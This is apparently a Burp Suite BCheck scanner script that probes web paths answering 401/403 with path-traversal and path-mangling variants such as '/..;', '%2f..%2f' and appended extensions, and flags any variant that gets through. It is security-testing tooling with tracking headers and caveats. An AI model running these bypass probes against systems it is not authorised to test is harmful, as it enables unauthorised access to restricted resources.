#Verified: Yes
# Active check for 401/403 "forbidden path" bypasses.
# When an in-scope request comes back 401/403 from the application itself
# (not from a CDN/WAF edge page), the same path is re-requested with a set of
# path-mangling variants and any variant that no longer returns an error
# status is reported (high severity, tentative confidence).
# Every probe carries the "X-BCheck: path-bypass" header so the extra traffic
# can be recognised and filtered in server logs and WAF consoles.
# Traffic caveat: the check is keyed on "given request then", so every
# matching request (not every distinct path) triggers one probe per payload,
# i.e. 11 extra requests each time the same 403 endpoint is seen.
metadata:
language: v2-beta
name: "Path-bypass"
description: "Trying out techniques to bypass a restricted path discovered in the application. Except firewall 403 respones to avoid a lot of junk traffic."
tags: "active", "bypass", "path", "forbidden", "403"
author: "Brumens"
define:
desc = "Possible that a bypass technique worked and that we accessed a restricted path in the application"
reme = "Manual testing is required to confirm the issue"
trackHeader = "X-BCheck"
trackValue = "path-bypass"
# Payload list, one probe per entry. How each entry is used is decided by the
# branches below: "/" is a control request to the unmodified path (never
# reported); "__EXT_PAYLOAD__" entries append an extension to the path;
# "__FULL_URL__" puts the absolute URL in the request line; every other entry
# is prepended to the path as-is (e.g. "/..;" + "/admin" -> "/..;/admin").
run for each:
payload =
"/",
"//",
"/..;",
"/..",
"%2f..%2f",
"/notfound/%2f..%2f../",
"/;",
"/.",
"__EXT_PAYLOAD__.json",
"__EXT_PAYLOAD__.html",
"__FULL_URL__"
given request then
# Only act on a 401/403 that looks like an application-level refusal, not a
# CDN/WAF block page. The body markers are heuristics (Cloudflare "Ray ID:",
# "CloudFront", and a generic "What happened?" + "security" page); an edge
# product that uses other wording will still be probed.
if {latest.response.status_code} matches "40(3|1)" and not( ("What happened?" in {latest.response.body} and "security" in {latest.response.body}) or "Ray ID:" in {latest.response.body} or "CloudFront" in {latest.response.body} ) then
# Control request: re-send the original path unchanged, with the tracking
# header. Its response is not used anywhere - the report condition below
# explicitly skips the "/" payload.
if {payload} is "/" then
send request:
method: "GET"
path: {latest.request.url.path}
replacing headers: `{trackHeader}`:`{trackValue}`
#Extension bypass technique: /admin -> /admin.json, /admin/ -> /admin.json
else if "__EXT_PAYLOAD__" in {payload} then
#Check if the path end with a forward slash:
# NOTE(review): the test reads {latest.request.url.path} but the probes
# below build on {latest.response.url.path} - confirm both resolve to the
# same value in this BCheck version.
if {latest.request.url.path} matches "^.*\/$" then
# Trailing slash is replaced by the extension rather than appended to.
send request:
method: "GET"
path: `{regex_replace({latest.response.url.path}, "\/$", {regex_replace({payload}, "__EXT_PAYLOAD__", "")})}`
replacing headers: `{trackHeader}`:`{trackValue}`
else then
send request:
method: "GET"
path: `{latest.response.url.path}{regex_replace({payload}, "__EXT_PAYLOAD__", "")}`
replacing headers: `{trackHeader}`:`{trackValue}`
end if
#Use full URL in path technique: absolute URI in the request line
#(GET http://host/path), which some proxies/ACLs are presumed to match
#differently from a relative path.
else if "__FULL_URL__" in {payload} then
send request:
method: "GET"
path: `{latest.request.url}`
replacing headers: `{trackHeader}`:`{trackValue}`
#Prefix payload bypass technique: payload is prepended to the path,
#e.g. "//admin", "/..;/admin", "/./admin", "%2f..%2f/admin".
else then
send request:
method: "GET"
path: `{payload}{latest.response.url.path}`
replacing headers: `{trackHeader}`:`{trackValue}`
end if
#Check if any technique was capable of bypassing the restricted endpoint:
# Reports when the probe (any payload except the "/" control) returned
# anything other than 400/401/403/404/503. This means 3xx redirects, 405,
# 429 and other 5xx responses are also reported as possible bypasses, which
# is why confidence is tentative and manual confirmation is required.
if not( {latest.response.status_code} matches "(40[0134]|503)" ) and not( {payload} is "/" ) then
report issue and continue:
severity: high
confidence: tentative
detail: {desc}
remediation: {reme}
end if
end if